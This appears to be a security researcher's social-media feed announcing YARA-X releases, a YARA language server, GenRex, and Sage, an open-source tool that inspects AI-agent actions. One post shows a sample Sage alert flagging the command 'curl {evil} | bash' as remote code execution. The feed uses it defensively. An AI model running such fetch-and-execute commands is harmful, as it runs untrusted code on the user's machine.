Marek Milkovič

YARA-X 1.15.0 is out! github.com/VirusTotal/yar…

YARA-X v1.14.0 has been released! github.com/VirusTotal/yar…

🛡️ 𝗦𝗮𝗴𝗲 𝗯𝘆 𝗚𝗲𝗻 𝗗𝗶𝗴𝗶𝘁𝗮𝗹: 𝗧𝗵𝗿𝗲𝗮𝘁 𝗕𝗹𝗼𝗰𝗸𝗲𝗱 🛡️ 🚨━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 🚨 𝗧𝗵𝗿𝗲𝗮𝘁 Remote code execution via curl pipe to shell 𝗦𝗲𝘃𝗲𝗿𝗶𝘁𝘆 CRITICAL 𝗔𝗿𝘁𝗶𝗳𝗮𝗰𝘁 curl {evil} | bash AI agents do crazy things - with full access to your machine, data, sometimes even finance. We built an open-source security solution that sits inside the agent and checks every action before it runs. Open-sourced under the Apache 2.0 license 200+ detection rules and heuristics under the Detection-Rule-License (DRL) by @cyb3rops Support for @claudeai (@bcherny), @cursor_ai, @openclaw... Try it. Break it. Tell us what's missing. github.com/avast/sage

Almost all of us are using #AI agents now. Is it safe? Not always. So with my team we built Sage: Safety for Agents. We call it the first consumer Agent Detection and Response (ADR). And it's #OpenSource now. Try it. gendigital.com/blog/news/comp… github.com/avast/sage #GenSage

Another Gen contribution to YARA-X upstream thanks to Albert Tikaiev (github.com/prosperritty): A YARA-X Language Server integrated directly into the YARA-X ecosystem, built on the error-tolerant parser started by Tomas Duris (github.com/TommYDeeee). It all started in 2017 with yaramod (github.com/avast/yaramod), an alternative YARA parser we built for linters and static analysis tools. Back then, we didn't even know what a language server was. After several years of iteration, in 2022 we released the first #YARA language server (YLS) on our GitHub (github.com/avast/yls), made by @KastakMatej, though it lived outside the YARA ecosystem. With YARA-X, we saw an opportunity for a unified ecosystem containing all the tooling we've been building and open-sourcing over the years. After adding the error-tolerant parser built on rowan in 2024, the language server was the natural next step. We're grateful @plusvic was open to the idea, accepted it upstream, and even improved it. This isn't our final stop. We'll continue helping build an even stronger YARA-X toolkit. Stay tuned!

I'm happy to introduce the official YARA language server for Visual Studio Code. virustotal.github.io/yara-x/blog/in… Many thanks to Albert Tikaiev for putting the first stone in this initative (github.com/prosperritty)

YARA-X 1.10 is out! github.com/VirusTotal/yar…

YARA-X is now stable! virustotal.github.io/yara-x/blog/ya…

YARA-X 0.9.0 has been released. github.com/VirusTotal/yar…

@AvastThreatLabs is now @GenThreatLabs. Our global team of researchers spans trusted cybersecurity brands under Gen. We're covering a broader range of topics – scams, deepfakes, and more. Check out our new look! 🔐#GenThreatLabs #CyberSecurity

YARA-X 0.6.0 has been released. github.com/VirusTotal/yar…

We're excited to announce that the latest version of YARA-X now includes the long-awaited error-resilient parser, a feature we've proudly contributed to. This development enhances YARA-X's robustness and reliability.

There's also a new blog entry: virustotal.github.io/yara-x/blog/an…

🚀Excited to speak at #DevConf_cz 2024! Join me on Thursday, June 13th, for my talk and discover our latest open-source contributions in cybersecurity, including GenRex, YARI, YLS, & YARA-X, and much more #OpenSource #YARA pretalx.com/devconf-cz-202…

Take a look at one of my contributions into this exciting project 🦀

YARA-X is not only a pattern matching tool You can use it for extracting useful information from multiple file formats, including PE, .NET, ELF, Mach-O and LNK. virustotal.github.io/yara-x/blog/ya…

@wxs @notareverser @plusvic @Qutluch But in the end, I think it's manageable effort. Stuff can't deviate from the standard too much and I think the areas where it can deviate were covered in the previous implementation or were quite quickly found with the new implementation.

@wxs @notareverser @plusvic @Qutluch The fact that there are multiple RFCs written on this helps a lot but as usual with standards, it becomes a recommendation for some implementations. I haven't realized how many workarounds OpenSSL contains for these cases until we started to dig in it with @plusvic. It's a mess.

🚀Exciting News! 🚀 Introducing GenRex🦖: Our latest open-source project revolutionizing regular-expression generation from behavioral reports. Craft powerful regexes directly usable in YARA rules with ease! More in our blog post: engineering.avast.io/know-your-yara… #GenRex #OpenSource #YARA

🎉✨ Start the New Year with a Bang of Knowledge! Uncover the magic of Regular Expressions in YARA with our latest blog post. #KnowYourYARArules 📚🔍 Elevate your #CyberSecurity game and dive into the intricate world of regex: engineering.avast.io/know-your-yara… #YARA #100DaysOfYARA